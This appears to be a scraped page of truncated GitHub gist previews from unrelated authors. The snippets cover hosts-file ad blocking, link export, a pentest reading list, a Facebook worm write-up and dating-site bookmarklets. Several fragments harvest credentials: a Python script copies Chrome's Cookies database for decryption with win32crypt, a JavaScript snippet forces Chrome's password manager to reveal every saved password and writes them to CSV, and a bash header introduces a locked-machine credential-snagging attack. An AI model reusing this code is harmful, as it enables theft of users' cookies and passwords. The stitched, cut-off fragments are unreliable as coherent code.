joielechong

# On Windows 7, 8, 10 Hosts file is in c:\windows\system32\drivers\etc\hosts
#
# Block Skype ads

127.0.0.1 secure-sin.adnxs.com # On skype 7.*
127.0.0.1 *.adnxs.com # On skype 7.*
127.0.0.1 logi10.xiti.com # On skype 7.*
127.0.0.1 *.everesttech.net # On skype 7.*
127.0.0.1 pixel.everesttech.net # On skype 7.*
127.0.0.1 d.adroll.com # On skype 7.*

thibaudcolas

/*
 * This little snippet is to be copied and pasted in Chrome's DevTools Console.
 * It will make a CSV-like list of all the links on a page, formatting their text label nicely if it can.
 */
$('a').map((i, a) => `${a.href},${a.textContent.replace(/\n/g, '').replace(/\s\s+/g, ' ').trim()}`).toArray().join('\n')

binkybear

#!/bin/bash
#
# Attack created by Mubix.  For more information see: 
# https://room362.com/post/2016/snagging-creds-from-locked-machines
# Modified for Nethunter by Binkybear
#

# ================== #
# Check for root
# ================== #

DakuTree

#Based off https://gist.github.com/DakuTree/98c8362fb424351b803e & pieces of https://gist.github.com/jordan-wright/5770442
from os import getenv
from shutil import copyfile
import sqlite3
import win32crypt #https://sourceforge.net/projects/pywin32/

# Copy Cookies to current folder
copyfile(getenv("APPDATA") + "/../Local/Google/Chrome/User Data/Default/Cookies", './Cookies')

# Connect to the Database

techeverri

(function () {

    'use strict';

    var fs = require('fs');
    var https = require('https');

    var cursor = '';
    var pushes = [];

walalm

var decryptedRow="";
var pm = PasswordManager.getInstance();
var model = pm.savedPasswordsList_.dataModel;
var pl = pm.savedPasswordsList_;
for(i=0;i<model.length;i++){
  PasswordManager.requestShowPassword(i);
};
setTimeout(function(){
  decryptedRow += '"Name","URL","Username","Password"';
  for(i=0; i<model.length; i++){

IntergalacticApps

@echo off
setlocal EnableDelayedExpansion

ver | find "10." > nul
if errorlevel 1 (
	echo Your Windows version is not Windows 10... yet. Brace yourself, Windows 10 is coming^^!
	pause
	exit
)

ckeyer

入门指南

• https://wizardforcel.gitbooks.io/web-hacking-101/content/ Web Hacking 101 中文版
• https://wizardforcel.gitbooks.io/asani/content/ 浅入浅出Android安全 中文版
• https://wizardforcel.gitbooks.io/lpad/content/ Android 渗透测试学习手册 中文版
• https://wizardforcel.gitbooks.io/kali-linux-web-pentest-cookbook/content/ Kali Linux Web渗透测试秘籍 中文版
• https://github.com/hardenedlinux/linux-exploit-development-tutorial Linux exploit 开发入门
• https://www.gitbook.com/book/t0data/burpsuite/details burpsuite实战指南
• http://www.kanxue.com/?article-read-1108.htm=&winzoom=1 渗透测试Node.js应用
• https://github.com/qazbnm456/awesome-web-security Web安全资料和资源列表

phwd

Digging into a Facebook Worm

http://i.imgur.com/zc2A8vJ.png

Facebook worms are interesting

The following was a link that was shared to me (You probably shouldn't click it)

https://www.facebook.com/l.php?u=https%3A%2F%2Fcdn.fbsbx.com%2Fhphotos-xpa1%2Fv%2Ft59.2708-21%2F12447002_1746605272238633_1642381431_n.html%2FV1DE0-9682.html%3Foh%3D8a665fb34c8793a92fd02cceb31d4b01%26oe%3D5718116B%26dl%3D1&h=cAQHPcYE7

JavaScript-Packer

/* Go to http://jsfiddle.net/5v5r8npk/ for drag & drop link marklets, easiest way to add to bookmarks! */

// BareBackRT.com
javascript:var _='',$=document,whaks = document.getElementsByTagName("img");for (var i = 0, whak; whak = whaks[i]; i++) {_+='<img src="'+whak.src.replace(/\x26\x73\x3d/g,"&s=1")+'"> ';};$.body.innerHTML=_+'<hr>Visit <a href="http://www.whak.com">www.WHAK.com</a><hr>'+$.body.innerHTML;void 0;

// Adam4Adam.com
javascript:var $=document;$.body.innerHTML='<img src=%22'+large_img+'%22><hr>Visit <a href=%22http://www.whak.com%22>www.WHAK.com</a><hr>'+$.body.innerHTML;void 0;

// Squirt.org
javascript:var _='',$=document,whaks = document.getElementsByTagName(%22img%22);for (var i = 0, whak; whak = whaks[i]; i++) {_+='<img src=%22'+whak.src.replace(/\x26\x70\x73\x3d/g,%22&ps=1&%22)+'%22> ';};$.body.innerHTML=_+'<hr>Visit <a href=%22http://www.whak.com%22>www.WHAK.com</a><hr>'+$.body.innerHTML;void 0;